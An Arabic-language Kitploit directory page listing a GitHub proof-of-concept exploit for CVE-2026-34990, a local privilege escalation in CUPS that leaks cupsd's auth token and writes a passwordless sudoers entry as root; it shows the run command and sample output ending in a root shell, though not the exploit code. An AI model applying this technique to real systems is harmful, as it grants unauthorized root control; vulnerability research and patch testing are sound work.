Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-34990 — حالة إثبات مفهوم دنيا لـ CVE-2026-34990: تصعيد صلاحيات محلي في CUPS <= 2.4.16 يؤدي إلى تسريب رمز مصادقة Local الخاص بـ cupsd وكتابة جزء sudoers من نوع NOPASSWD بصلاحيات الجذر. | Kitploit
أدوات/GitHubGitHub/predyy/cve-2026-34990
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالمحاكاة الافتراضية للأماناختبار الاختراق
GitHubpredyy/cve-2026-34990

CVE-2026-34990

حالة إثبات مفهوم دنيا لـ CVE-2026-34990: تصعيد صلاحيات محلي في CUPS <= 2.4.16 يؤدي إلى تسريب رمز مصادقة Local الخاص بـ cupsd وكتابة جزء sudoers من نوع NOPASSWD بصلاحيات الجذر.

عرض المستودع
29منذ 3 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-34990 - تصعيد صلاحيات محلي في CUPS

تصعيد صلاحيات محلي ضد CUPS <= 2.4.16 الذي يعمل بصلاحيات root. يسرّب رمز المصادقة المحلي الخاص بـ cupsd، ثم يكتب جزء sudoers بدون كلمة مرور (NOPASSWD) بصلاحيات root عبر طابور طباعة file://.

الاستخدام

python3 poc.py

عند النجاح:

[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i

ثم:

sudo -i

إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال. تأكد دائمًا من حصولك على إذن قبل اختبار أو استغلال الثغرات!

تنزيل الأداة